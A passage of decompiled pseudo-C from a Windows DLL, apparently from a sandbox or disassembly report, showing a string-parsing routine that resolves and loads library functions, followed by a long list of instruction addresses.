                                                                                  									goto L35;
                                                                                  								}
                                                                                  								while(1) {
                                                                                  									L35:
                                                                                  									_t249 =  *(_t332 + 0x1ca0);
                                                                                  									__eflags = _t249 - _t283;
                                                                                  									if(_t249 == _t283) {
                                                                                  										break;
                                                                                  									}
                                                                                  									_t328 = _t332;
                                                                                  									_t332 = _t249;
                                                                                  									__eflags = _t332 - _t283;
                                                                                  									if(_t332 != _t283) {
                                                                                  										continue;
                                                                                  									}
                                                                                  									break;
                                                                                  								}
                                                                                  								__eflags = _t328 - _t283;
                                                                                  								if(_t328 != _t283) {
                                                                                  									 *(_t328 + 0x1ca0) = _t283;
                                                                                  								}
                                                                                  								_t250 =  *(_t332 + 0x1010);
                                                                                  								__eflags = _t250 & 0x00000008;
                                                                                  								if((_t250 & 0x00000008) == 0) {
                                                                                  									_t251 = _t250 | 0x00000002;
                                                                                  									__eflags = _t251;
                                                                                  									 *(_t332 + 0x1010) = _t251;
                                                                                  								} else {
                                                                                  									_t332 = E7154162F(_t332);
                                                                                  									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
                                                                                  								}
                                                                                  								goto L42;
                                                                                  							} else {
                                                                                  								_t300 = _t288 - 1;
                                                                                  								__eflags = _t300;
                                                                                  								if(_t300 == 0) {
                                                                                  									L31:
                                                                                  									lstrcpyW(_t217, _v48);
                                                                                  									L32:
                                                                                  									lstrcpyW(_t322, _v24);
                                                                                  									goto L42;
                                                                                  								}
                                                                                  								_t301 = _t300 - 1;
                                                                                  								__eflags = _t301;
                                                                                  								if(_t301 == 0) {
                                                                                  									goto L32;
                                                                                  								}
                                                                                  								__eflags = _t301 != 1;
                                                                                  								if(_t301 != 1) {
                                                                                  									goto L42;
                                                                                  								}
                                                                                  								goto L31;
                                                                                  							}
                                                                                  						} else {
                                                                                  							if(_t215 == 1) {
                                                                                  								_t257 = _v16;
                                                                                  								if(_v40 == _t283) {
                                                                                  									_t257 = _t257 - 1;
                                                                                  								}
                                                                                  								 *(_t332 + 0x1014) = _t257;
                                                                                  							}
                                                                                  							L42:
                                                                                  							_v12 = _v12 + 2;
                                                                                  							_v28 = _v24;
                                                                                  							L59:
                                                                                  							if(_v32 != 0xffffffff) {
                                                                                  								_t321 = _v12;
                                                                                  								continue;
                                                                                  							}
                                                                                  							break;
                                                                                  						}
                                                                                  					}
                                                                                  					_t258 = _t213 - 0x23;
                                                                                  					if(_t258 == 0) {
                                                                                  						__eflags = _t321 - _v56;
                                                                                  						if(_t321 <= _v56) {
                                                                                  							L17:
                                                                                  							__eflags = _v44 - _t283;
                                                                                  							if(_v44 != _t283) {
                                                                                  								L43:
                                                                                  								_t260 = _v32 - _t283;
                                                                                  								__eflags = _t260;
                                                                                  								if(_t260 == 0) {
                                                                                  									_t261 = _t286;
                                                                                  									while(1) {
                                                                                  										__eflags = _t261 - 0x22;
                                                                                  										if(_t261 != 0x22) {
                                                                                  											break;
                                                                                  										}
                                                                                  										_t321 =  &(_t321[1]);
                                                                                  										__eflags = _v44 - _t283;
                                                                                  										_v12 = _t321;
                                                                                  										if(_v44 == _t283) {
                                                                                  											_v44 = 1;
                                                                                  											L162:
                                                                                  											_v28 =  &(_v28[0]);
                                                                                  											 *_v28 =  *_t321;
                                                                                  											L58:
                                                                                  											_t331 =  &(_t321[1]);
                                                                                  											__eflags = _t331;
                                                                                  											_v12 = _t331;
                                                                                  											goto L59;
                                                                                  										}
                                                                                  										_t261 =  *_t321 & 0x0000ffff;
                                                                                  										_v44 = _t283;
                                                                                  									}
                                                                                  									__eflags = _t261 - 0x2a;
                                                                                  									if(_t261 == 0x2a) {
                                                                                  										_v36 = 2;
                                                                                  										L57:
                                                                                  										_t321 = _v12;
                                                                                  										_v28 = _v24;
                                                                                  										_t283 = 0;
                                                                                  										__eflags = 0;
                                                                                  										goto L58;
                                                                                  									}
                                                                                  									__eflags = _t261 - 0x2d;
                                                                                  									if(_t261 == 0x2d) {
                                                                                  										L151:
                                                                                  										_t304 =  *_t321;
                                                                                  										__eflags = _t304 - 0x2d;
                                                                                  										if(_t304 != 0x2d) {
                                                                                  											L154:
                                                                                  											_t264 =  &(_t321[1]);
                                                                                  											__eflags =  *_t264 - 0x3a;
                                                                                  											if( *_t264 != 0x3a) {
                                                                                  												goto L162;
                                                                                  											}
                                                                                  											__eflags = _t304 - 0x2d;
                                                                                  											if(_t304 == 0x2d) {
                                                                                  												goto L162;
                                                                                  											}
                                                                                  											_v36 = 1;
                                                                                  											L157:
                                                                                  											_v12 = _t264;
                                                                                  											__eflags = _v28 - _v24;
                                                                                  											if(_v28 <= _v24) {
                                                                                  												 *_v48 = _t283;
                                                                                  											} else {
                                                                                  												 *_v28 = _t283;
                                                                                  												lstrcpyW(_v48, _v24);
                                                                                  											}
                                                                                  											goto L57;
                                                                                  										}
                                                                                  										_t264 =  &(_t321[1]);
                                                                                  										__eflags =  *_t264 - 0x3e;
                                                                                  										if( *_t264 != 0x3e) {
                                                                                  											goto L154;
                                                                                  										}
                                                                                  										_v36 = 3;
                                                                                  										goto L157;
                                                                                  									}
                                                                                  									__eflags = _t261 - 0x3a;
                                                                                  									if(_t261 != 0x3a) {
                                                                                  										goto L162;
                                                                                  									}
                                                                                  									goto L151;
                                                                                  								}
                                                                                  								_t269 = _t260 - 1;
                                                                                  								__eflags = _t269;
                                                                                  								if(_t269 == 0) {
                                                                                  									L80:
                                                                                  									_t305 = _t286 + 0xffffffde;
                                                                                  									__eflags = _t305 - 0x55;
                                                                                  									if(_t305 > 0x55) {
                                                                                  										goto L57;
                                                                                  									}
                                                                                  									switch( *((intOrPtr*)(( *(_t305 + 0x715423e8) & 0x000000ff) * 4 +  &M7154235C))) {
                                                                                  										case 0:
                                                                                  											__ecx = _v24;
                                                                                  											__edi = _v12;
                                                                                  											while(1) {
                                                                                  												__edi = __edi + 1;
                                                                                  												__edi = __edi + 1;
                                                                                  												_v12 = __edi;
                                                                                  												__ax =  *__edi;
                                                                                  												__eflags = __ax - __dx;
                                                                                  												if(__ax != __dx) {
                                                                                  													goto L132;
                                                                                  												}
                                                                                  												L131:
                                                                                  												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                                                  												if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                                                                  													L136:
                                                                                  													 *__ecx =  *__ecx & 0x00000000;
                                                                                  													__eax = E715412CC(_v24);
                                                                                  													__ebx = __eax;
                                                                                  													goto L97;
                                                                                  												}
                                                                                  												L132:
                                                                                  												__eflags = __ax;
                                                                                  												if(__ax == 0) {
                                                                                  													goto L136;
                                                                                  												}
                                                                                  												__eflags = __ax - __dx;
                                                                                  												if(__ax == __dx) {
                                                                                  													__edi = __edi + 1;
                                                                                  													__edi = __edi + 1;
                                                                                  													__eflags = __edi;
                                                                                  												}
                                                                                  												__ax =  *__edi;
                                                                                  												 *__ecx =  *__edi;
                                                                                  												__ecx = __ecx + 1;
                                                                                  												__ecx = __ecx + 1;
                                                                                  												__edi = __edi + 1;
                                                                                  												__edi = __edi + 1;
                                                                                  												_v12 = __edi;
                                                                                  												__ax =  *__edi;
                                                                                  												__eflags = __ax - __dx;
                                                                                  												if(__ax != __dx) {
                                                                                  													goto L132;
                                                                                  												}
                                                                                  												goto L131;
                                                                                  											}
                                                                                  										case 1:
                                                                                  											_v8 = 1;
                                                                                  											goto L57;
                                                                                  										case 2:
                                                                                  											_v8 = _v8 | 0xffffffff;
                                                                                  											goto L57;
                                                                                  										case 3:
                                                                                  											_v8 = _v8 & 0x00000000;
                                                                                  											_v20 = _v20 & 0x00000000;
                                                                                  											_v16 = _v16 + 1;
                                                                                  											goto L85;
                                                                                  										case 4:
                                                                                  											__eflags = _v20;
                                                                                  											if(_v20 != 0) {
                                                                                  												goto L57;
                                                                                  											}
                                                                                  											_v12 = _v12 - 2;
                                                                                  											__ebx = E715412BB();
                                                                                  											 &_v12 = E71541B86( &_v12);
                                                                                  											__eax = E71541510(__edx, __eax, __edx, __ebx);
                                                                                  											goto L97;
                                                                                  										case 5:
                                                                                  											L105:
                                                                                  											_v20 = _v20 + 1;
                                                                                  											goto L57;
                                                                                  										case 6:
                                                                                  											_push(7);
                                                                                  											goto L123;
                                                                                  										case 7:
                                                                                  											_push(0x19);
                                                                                  											goto L143;
                                                                                  										case 8:
                                                                                  											__eax = 0;
                                                                                  											__eax = 1;
                                                                                  											__eflags = 1;
                                                                                  											goto L107;
                                                                                  										case 9:
                                                                                  											_push(0x15);
                                                                                  											goto L143;
                                                                                  										case 0xa:
                                                                                  											_push(0x16);
                                                                                  											goto L143;
                                                                                  										case 0xb:
                                                                                  											_push(0x18);
                                                                                  											goto L143;
                                                                                  										case 0xc:
                                                                                  											__eax = 0;
                                                                                  											__eax = 1;
                                                                                  											__eflags = 1;
                                                                                  											goto L118;
                                                                                  										case 0xd:
                                                                                  											__eax = 0;
                                                                                  											__eax = 1;
                                                                                  											__eflags = 1;
                                                                                  											goto L109;
                                                                                  										case 0xe:
                                                                                  											__eax = 0;
                                                                                  											__eax = 1;
                                                                                  											__eflags = 1;
                                                                                  											goto L111;
                                                                                  										case 0xf:
                                                                                  											__eax = 0;
                                                                                  											__eax = 1;
                                                                                  											__eflags = 1;
                                                                                  											goto L122;
                                                                                  										case 0x10:
                                                                                  											__eax = 0;
                                                                                  											__eax = 1;
                                                                                  											__eflags = 1;
                                                                                  											goto L113;
                                                                                  										case 0x11:
                                                                                  											_push(3);
                                                                                  											goto L123;
                                                                                  										case 0x12:
                                                                                  											_push(0x17);
                                                                                  											L143:
                                                                                  											_pop(__ebx);
                                                                                  											goto L98;
                                                                                  										case 0x13:
                                                                                  											__eax =  &_v12;
                                                                                  											__eax = E71541B86( &_v12);
                                                                                  											__ebx = __eax;
                                                                                  											__ebx = __eax + 1;
                                                                                  											__eflags = __ebx - 0xb;
                                                                                  											if(__ebx < 0xb) {
                                                                                  												__ebx = __ebx + 0xa;
                                                                                  											}
                                                                                  											goto L97;
                                                                                  										case 0x14:
                                                                                  											__ebx = 0xffffffff;
                                                                                  											goto L98;
                                                                                  										case 0x15:
                                                                                  											__eax = 0;
                                                                                  											__eax = 1;
                                                                                  											__eflags = 1;
                                                                                  											goto L116;
                                                                                  										case 0x16:
                                                                                  											__ecx = 0;
                                                                                  											__eflags = 0;
                                                                                  											goto L91;
                                                                                  										case 0x17:
                                                                                  											__eax = 0;
                                                                                  											__eax = 1;
                                                                                  											__eflags = 1;
                                                                                  											goto L120;
                                                                                  										case 0x18:
                                                                                  											_t271 =  *(_t332 + 0x1014);
                                                                                  											__eflags = _t271 - _v16;
                                                                                  											if(_t271 > _v16) {
                                                                                  												_v16 = _t271;
                                                                                  											}
                                                                                  											_v8 = _v8 & 0x00000000;
                                                                                  											_v20 = _v20 & 0x00000000;
                                                                                  											_v36 - 3 = _t271 - (_v36 == 3);
                                                                                  											if(_t271 != _v36 == 3) {
                                                                                  												L85:
                                                                                  												_v40 = 1;
                                                                                  											}
                                                                                  											goto L57;
                                                                                  										case 0x19:
                                                                                  											L107:
                                                                                  											__ecx = 0;
                                                                                  											_v8 = 2;
                                                                                  											__ecx = 1;
                                                                                  											goto L91;
                                                                                  										case 0x1a:
                                                                                  											L118:
                                                                                  											_push(5);
                                                                                  											goto L123;
                                                                                  										case 0x1b:
                                                                                  											L109:
                                                                                  											__ecx = 0;
                                                                                  											_v8 = 3;
                                                                                  											__ecx = 1;
                                                                                  											goto L91;
                                                                                  										case 0x1c:
                                                                                  											L111:
                                                                                  											__ecx = 0;
                                                                                  											__ecx = 1;
                                                                                  											goto L91;
                                                                                  										case 0x1d:
                                                                                  											L122:
                                                                                  											_push(6);
                                                                                  											goto L123;
                                                                                  										case 0x1e:
                                                                                  											L113:
                                                                                  											_push(2);
                                                                                  											goto L123;
                                                                                  										case 0x1f:
                                                                                  											__eax =  &_v12;
                                                                                  											__eax = E71541B86( &_v12);
                                                                                  											__ebx = __eax;
                                                                                  											__ebx = __eax + 1;
                                                                                  											goto L97;
                                                                                  										case 0x20:
                                                                                  											L116:
                                                                                  											_v52 = _v52 + 1;
                                                                                  											_push(4);
                                                                                  											_pop(__ecx);
                                                                                  											goto L91;
                                                                                  										case 0x21:
                                                                                  											L120:
                                                                                  											_push(4);
                                                                                  											L123:
                                                                                  											_pop(__ecx);
                                                                                  											L91:
                                                                                  											__edi = _v16;
                                                                                  											__edx =  *(0x7154405c + __ecx * 4);
                                                                                  											__eax =  ~__eax;
                                                                                  											asm("sbb eax, eax");
                                                                                  											_v40 = 1;
                                                                                  											__edi = _v16 << 5;
                                                                                  											__eax = __eax & 0x00008000;
                                                                                  											__edi = (_v16 << 5) + __esi;
                                                                                  											__eax = __eax | __ecx;
                                                                                  											__eflags = _v8;
                                                                                  											 *(__edi + 0x1018) = __eax;
                                                                                  											if(_v8 < 0) {
                                                                                  												L93:
                                                                                  												__edx = 0;
                                                                                  												__edx = 1;
                                                                                  												__eflags = 1;
                                                                                  												L94:
                                                                                  												__eflags = _v8 - 1;
                                                                                  												 *(__edi + 0x1028) = __edx;
                                                                                  												if(_v8 == 1) {
                                                                                  													__eax =  &_v12;
                                                                                  													__eax = E71541B86( &_v12);
                                                                                  													__eax = __eax + 1;
                                                                                  													__eflags = __eax;
                                                                                  													_v8 = __eax;
                                                                                  												}
                                                                                  												__eax = _v8;
                                                                                  												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                                                                                  												_t136 = _v16 + 0x81; // 0x81
                                                                                  												_t136 = _t136 << 5;
                                                                                  												__eax = 0;
                                                                                  												__eflags = 0;
                                                                                  												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
                                                                                  												 *((intOrPtr*)(__edi + 0x1030)) = 0;
                                                                                  												 *((intOrPtr*)(__edi + 0x102c)) = 0;
                                                                                  												L97:
                                                                                  												__eflags = __ebx;
                                                                                  												if(__ebx == 0) {
                                                                                  													goto L57;
                                                                                  												}
                                                                                  												L98:
                                                                                  												__eflags = _v20;
                                                                                  												_v40 = 1;
                                                                                  												if(_v20 != 0) {
                                                                                  													L103:
                                                                                  													__eflags = _v20 - 1;
                                                                                  													if(_v20 == 1) {
                                                                                  														__eax = _v16;
                                                                                  														__eax = _v16 << 5;
                                                                                  														__eflags = __eax;
                                                                                  														 *(__eax + __esi + 0x102c) = __ebx;
                                                                                  													}
                                                                                  													goto L105;
                                                                                  												}
                                                                                  												_v16 = _v16 << 5;
                                                                                  												_t144 = __esi + 0x1030; // 0x1030
                                                                                  												__edi = (_v16 << 5) + _t144;
                                                                                  												__eax =  *__edi;
                                                                                  												__eflags = __eax - 0xffffffff;
                                                                                  												if(__eax <= 0xffffffff) {
                                                                                  													L101:
                                                                                  													__eax = GlobalFree(__eax);
                                                                                  													L102:
                                                                                  													 *__edi = __ebx;
                                                                                  													goto L103;
                                                                                  												}
                                                                                  												__eflags = __eax - 0x19;
                                                                                  												if(__eax <= 0x19) {
                                                                                  													goto L102;
                                                                                  												}
                                                                                  												goto L101;
                                                                                  											}
                                                                                  											__eflags = __edx;
                                                                                  											if(__edx > 0) {
                                                                                  												goto L94;
                                                                                  											}
                                                                                  											goto L93;
                                                                                  										case 0x22:
                                                                                  											goto L57;
                                                                                  									}
                                                                                  								}
                                                                                  								_t272 = _t269 - 1;
                                                                                  								__eflags = _t272;
                                                                                  								if(_t272 == 0) {
                                                                                  									_v16 = _t283;
                                                                                  									goto L80;
                                                                                  								}
                                                                                  								__eflags = _t272 != 1;
                                                                                  								if(_t272 != 1) {
                                                                                  									goto L162;
                                                                                  								}
                                                                                  								__eflags = _t286 - 0x6e;
                                                                                  								if(__eflags > 0) {
                                                                                  									_t309 = _t286 - 0x72;
                                                                                  									__eflags = _t309;
                                                                                  									if(_t309 == 0) {
                                                                                  										_push(4);
                                                                                  										L74:
                                                                                  										_pop(_t274);
                                                                                  										L75:
                                                                                  										__eflags = _v8 - 1;
                                                                                  										if(_v8 != 1) {
                                                                                  											_t96 = _t332 + 0x1010;
                                                                                  											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
                                                                                  											__eflags =  *_t96;
                                                                                  										} else {
                                                                                  											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
                                                                                  										}
                                                                                  										_v8 = 1;
                                                                                  										goto L57;
                                                                                  									}
                                                                                  									_t312 = _t309 - 1;
                                                                                  									__eflags = _t312;
                                                                                  									if(_t312 == 0) {
                                                                                  										_push(0x10);
                                                                                  										goto L74;
                                                                                  									}
                                                                                  									__eflags = _t312 != 0;
                                                                                  									if(_t312 != 0) {
                                                                                  										goto L57;
                                                                                  									}
                                                                                  									_push(0x40);
                                                                                  									goto L74;
                                                                                  								}
                                                                                  								if(__eflags == 0) {
                                                                                  									_push(8);
                                                                                  									goto L74;
                                                                                  								}
                                                                                  								_t315 = _t286 - 0x21;
                                                                                  								__eflags = _t315;
                                                                                  								if(_t315 == 0) {
                                                                                  									_v8 =  ~_v8;
                                                                                  									goto L57;
                                                                                  								}
                                                                                  								_t316 = _t315 - 0x11;
                                                                                  								__eflags = _t316;
                                                                                  								if(_t316 == 0) {
                                                                                  									_t274 = 0x100;
                                                                                  									goto L75;
                                                                                  								}
                                                                                  								_t317 = _t316 - 0x31;
                                                                                  								__eflags = _t317;
                                                                                  								if(_t317 == 0) {
                                                                                  									_t274 = 1;
                                                                                  									goto L75;
                                                                                  								}
                                                                                  								__eflags = _t317 != 0;
                                                                                  								if(_t317 != 0) {
                                                                                  									goto L57;
                                                                                  								}
                                                                                  								_push(0x20);
                                                                                  								goto L74;
                                                                                  							} else {
                                                                                  								_v32 = _t283;
                                                                                  								_v36 = _t283;
                                                                                  								goto L20;
                                                                                  							}
                                                                                  						}
                                                                                  						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
                                                                                  						if( *((short*)(_t321 - 2)) != 0x3a) {
                                                                                  							goto L17;
                                                                                  						}
                                                                                  						__eflags = _v32 - _t283;
                                                                                  						if(_v32 == _t283) {
                                                                                  							goto L43;
                                                                                  						}
                                                                                  						goto L17;
                                                                                  					}
                                                                                  					_t277 = _t258 - 5;
                                                                                  					if(_t277 == 0) {
                                                                                  						__eflags = _v44 - _t283;
                                                                                  						if(_v44 != _t283) {
                                                                                  							goto L43;
                                                                                  						} else {
                                                                                  							__eflags = _v36 - 3;
                                                                                  							_v32 = 1;
                                                                                  							_v8 = _t283;
                                                                                  							_v20 = _t283;
                                                                                  							_v16 = (0 | _v36 == 0x00000003) + 1;
                                                                                  							_v40 = _t283;
                                                                                  							goto L20;
                                                                                  						}
                                                                                  					}
                                                                                  					_t281 = _t277 - 1;
                                                                                  					if(_t281 == 0) {
                                                                                  						__eflags = _v44 - _t283;
                                                                                  						if(_v44 != _t283) {
                                                                                  							goto L43;
                                                                                  						} else {
                                                                                  							_v32 = 2;
                                                                                  							_v8 = _t283;
                                                                                  							_v20 = _t283;
                                                                                  							goto L20;
                                                                                  						}
                                                                                  					}
                                                                                  					if(_t281 != 0x16) {
                                                                                  						goto L43;
                                                                                  					} else {
                                                                                  						_v32 = 3;
                                                                                  						_v8 = 1;
                                                                                  						goto L20;
                                                                                  					}
                                                                                  				}
                                                                                  				GlobalFree(_v56);
                                                                                  				GlobalFree(_v24);
                                                                                  				GlobalFree(_v48);
                                                                                  				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
                                                                                  					L182:
                                                                                  					return _t332;
                                                                                  				} else {
                                                                                  					_t225 =  *_t332 - 1;
                                                                                  					if(_t225 == 0) {
                                                                                  						_t187 = _t332 + 8; // 0x8
                                                                                  						_t324 = _t187;
                                                                                  						__eflags =  *_t324 - _t283;
                                                                                  						if( *_t324 != _t283) {
                                                                                  							_t226 = GetModuleHandleW(_t324);
                                                                                  							__eflags = _t226 - _t283;
                                                                                  							 *(_t332 + 0x1008) = _t226;
                                                                                  							if(_t226 != _t283) {
                                                                                  								L171:
                                                                                  								_t192 = _t332 + 0x808; // 0x808
                                                                                  								_t325 = _t192;
                                                                                  								_t227 = E715416BD( *(_t332 + 0x1008), _t325);
                                                                                  								__eflags = _t227 - _t283;
                                                                                  								 *(_t332 + 0x100c) = _t227;
                                                                                  								if(_t227 == _t283) {
                                                                                  									__eflags =  *_t325 - 0x23;
                                                                                  									if( *_t325 == 0x23) {
                                                                                  										_t195 = _t332 + 0x80a; // 0x80a
                                                                                  										_t231 = E715413B1(_t195);
                                                                                  										__eflags = _t231 - _t283;
                                                                                  										if(_t231 != _t283) {
                                                                                  											__eflags = _t231 & 0xffff0000;
                                                                                  											if((_t231 & 0xffff0000) == 0) {
                                                                                  												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
                                                                                  											}
                                                                                  										}
                                                                                  									}
                                                                                  								}
                                                                                  								__eflags = _v52 - _t283;
                                                                                  								if(_v52 != _t283) {
                                                                                  									L178:
                                                                                  									_t325[lstrlenW(_t325)] = 0x57;
                                                                                  									_t229 = E715416BD( *(_t332 + 0x1008), _t325);
                                                                                  									__eflags = _t229 - _t283;
                                                                                  									if(_t229 != _t283) {
                                                                                  										L166:
                                                                                  										 *(_t332 + 0x100c) = _t229;
                                                                                  										goto L182;
                                                                                  									}
                                                                                  									__eflags =  *(_t332 + 0x100c) - _t283;
                                                                                  									L180:
                                                                                  									if(__eflags != 0) {
                                                                                  										goto L182;
                                                                                  									}
                                                                                  									L181:
                                                                                  									_t206 = _t332 + 4;
                                                                                  									 *_t206 =  *(_t332 + 4) | 0xffffffff;
                                                                                  									__eflags =  *_t206;
                                                                                  									goto L182;
                                                                                  								} else {
                                                                                  									__eflags =  *(_t332 + 0x100c) - _t283;
                                                                                  									if( *(_t332 + 0x100c) != _t283) {
                                                                                  										goto L182;
                                                                                  									}
                                                                                  									goto L178;
                                                                                  								}
                                                                                  							}
                                                                                  							_t234 = LoadLibraryW(_t324);
                                                                                  							__eflags = _t234 - _t283;
                                                                                  							 *(_t332 + 0x1008) = _t234;
                                                                                  							if(_t234 == _t283) {
                                                                                  								goto L181;
                                                                                  							}
                                                                                  							goto L171;
                                                                                  						}
                                                                                  						_t188 = _t332 + 0x808; // 0x808
                                                                                  						_t236 = E715413B1(_t188);
                                                                                  						 *(_t332 + 0x100c) = _t236;
                                                                                  						__eflags = _t236 - _t283;
                                                                                  						goto L180;
                                                                                  					}
                                                                                  					_t237 = _t225 - 1;
                                                                                  					if(_t237 == 0) {
                                                                                  						_t185 = _t332 + 0x808; // 0x808
                                                                                  						_t238 = _t185;
                                                                                  						__eflags =  *_t238 - _t283;
                                                                                  						if( *_t238 == _t283) {
                                                                                  							goto L182;
                                                                                  						}
                                                                                  						_t229 = E715413B1(_t238);
                                                                                  						L165:
                                                                                  						goto L166;
                                                                                  					}
                                                                                  					if(_t237 != 1) {
                                                                                  						goto L182;
                                                                                  					}
                                                                                  					_t81 = _t332 + 8; // 0x8
                                                                                  					_t284 = _t81;
                                                                                  					_t326 = E715413B1(_t81);
                                                                                  					 *(_t332 + 0x1008) = _t326;
                                                                                  					if(_t326 == 0) {
                                                                                  						goto L181;
                                                                                  					}
                                                                                  					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
                                                                                  					 *((intOrPtr*)(_t332 + 0x1050)) = E715412CC(_t284);
                                                                                  					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
                                                                                  					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
                                                                                  					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
                                                                                  					_t90 = _t332 + 0x808; // 0x808
                                                                                  					_t229 =  *(_t326->i + E715413B1(_t90) * 4);
                                                                                  					goto L165;
                                                                                  				}
                                                                                  			}


































































                                                                                  0x71541d54
                                                                                  0x71541d57
                                                                                  0x71541d5d
                                                                                  0x71541d63
                                                                                  0x71541d66
                                                                                  0x71541d8a
                                                                                  0x71541d8d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541d90
                                                                                  0x71541d92
                                                                                  0x71541da0
                                                                                  0x71541da3
                                                                                  0x71541da5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541da7
                                                                                  0x71541da7
                                                                                  0x71541da7
                                                                                  0x71541dad
                                                                                  0x71541daf
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541db1
                                                                                  0x71541db3
                                                                                  0x71541db5
                                                                                  0x71541db7
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541db7
                                                                                  0x71541db9
                                                                                  0x71541dbb
                                                                                  0x71541dbd
                                                                                  0x71541dbd
                                                                                  0x71541dc3
                                                                                  0x71541dc9
                                                                                  0x71541dcb
                                                                                  0x71541ddf
                                                                                  0x71541ddf
                                                                                  0x71541de1
                                                                                  0x71541dcd
                                                                                  0x71541dd3
                                                                                  0x71541dd6
                                                                                  0x71541dd6
                                                                                  0x00000000
                                                                                  0x71541d68
                                                                                  0x71541d68
                                                                                  0x71541d68
                                                                                  0x71541d69
                                                                                  0x71541d71
                                                                                  0x71541d75
                                                                                  0x71541d7b
                                                                                  0x71541d7f
                                                                                  0x00000000
                                                                                  0x71541d7f
                                                                                  0x71541d6b
                                                                                  0x71541d6b
                                                                                  0x71541d6c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541d6e
                                                                                  0x71541d6f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541d6f
                                                                                  0x71541cff
                                                                                  0x71541d00
                                                                                  0x71541d09
                                                                                  0x71541d0c
                                                                                  0x71541d19
                                                                                  0x71541d19
                                                                                  0x71541d0e
                                                                                  0x71541d0e
                                                                                  0x71541de7
                                                                                  0x71541dea
                                                                                  0x71541dee
                                                                                  0x71541e61
                                                                                  0x71541e65
                                                                                  0x71541c43
                                                                                  0x00000000
                                                                                  0x71541c43
                                                                                  0x00000000
                                                                                  0x71541e65
                                                                                  0x71541cfd
                                                                                  0x71541c68
                                                                                  0x71541c6b
                                                                                  0x71541cce
                                                                                  0x71541cd1
                                                                                  0x71541ce3
                                                                                  0x71541ce3
                                                                                  0x71541ce6
                                                                                  0x71541df3
                                                                                  0x71541df6
                                                                                  0x71541df6
                                                                                  0x71541df8
                                                                                  0x715421ae
                                                                                  0x715421c6
                                                                                  0x715421c6
                                                                                  0x715421c9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715421b3
                                                                                  0x715421b4
                                                                                  0x715421b7
                                                                                  0x715421ba
                                                                                  0x71542244
                                                                                  0x7154224b
                                                                                  0x71542251
                                                                                  0x71542255
                                                                                  0x71541e5c
                                                                                  0x71541e5d
                                                                                  0x71541e5d
                                                                                  0x71541e5e
                                                                                  0x00000000
                                                                                  0x71541e5e
                                                                                  0x715421c0
                                                                                  0x715421c3
                                                                                  0x715421c3
                                                                                  0x715421cb
                                                                                  0x715421ce
                                                                                  0x71542238
                                                                                  0x71541e51
                                                                                  0x71541e54
                                                                                  0x71541e57
                                                                                  0x71541e5a
                                                                                  0x71541e5a
                                                                                  0x00000000
                                                                                  0x71541e5a
                                                                                  0x715421d0
                                                                                  0x715421d3
                                                                                  0x715421da
                                                                                  0x715421da
                                                                                  0x715421dd
                                                                                  0x715421e1
                                                                                  0x715421f5
                                                                                  0x715421f5
                                                                                  0x715421f8
                                                                                  0x715421fc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715421fe
                                                                                  0x71542202
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71542204
                                                                                  0x7154220b
                                                                                  0x7154220b
                                                                                  0x71542211
                                                                                  0x71542214
                                                                                  0x71542230
                                                                                  0x71542216
                                                                                  0x7154221f
                                                                                  0x71542222
                                                                                  0x71542222
                                                                                  0x00000000
                                                                                  0x71542214
                                                                                  0x715421e3
                                                                                  0x715421e6
                                                                                  0x715421ea
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715421ec
                                                                                  0x00000000
                                                                                  0x715421ec
                                                                                  0x715421d5
                                                                                  0x715421d8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x715421d8
                                                                                  0x71541dfe
                                                                                  0x71541dfe
                                                                                  0x71541dff
                                                                                  0x71541f49
                                                                                  0x71541f49
                                                                                  0x71541f50
                                                                                  0x71541f53
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541f60
                                                                                  0x00000000
                                                                                  0x7154214b
                                                                                  0x7154214e
                                                                                  0x71542151
                                                                                  0x71542151
                                                                                  0x71542152
                                                                                  0x71542153
                                                                                  0x71542156
                                                                                  0x71542159
                                                                                  0x7154215c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x7154215e
                                                                                  0x7154215e
                                                                                  0x71542162
                                                                                  0x7154217a
                                                                                  0x7154217d
                                                                                  0x71542181
                                                                                  0x71542187
                                                                                  0x00000000
                                                                                  0x71542187
                                                                                  0x71542164
                                                                                  0x71542164
                                                                                  0x71542167
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71542169
                                                                                  0x7154216c
                                                                                  0x7154216e
                                                                                  0x7154216f
                                                                                  0x7154216f
                                                                                  0x7154216f
                                                                                  0x71542170
                                                                                  0x71542173
                                                                                  0x71542176
                                                                                  0x71542177
                                                                                  0x71542151
                                                                                  0x71542152
                                                                                  0x71542153
                                                                                  0x71542156
                                                                                  0x71542159
                                                                                  0x7154215c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x7154215c
                                                                                  0x00000000
                                                                                  0x71541fa7
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541fb3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x71541f9a
                                                                                  0x71541f9e
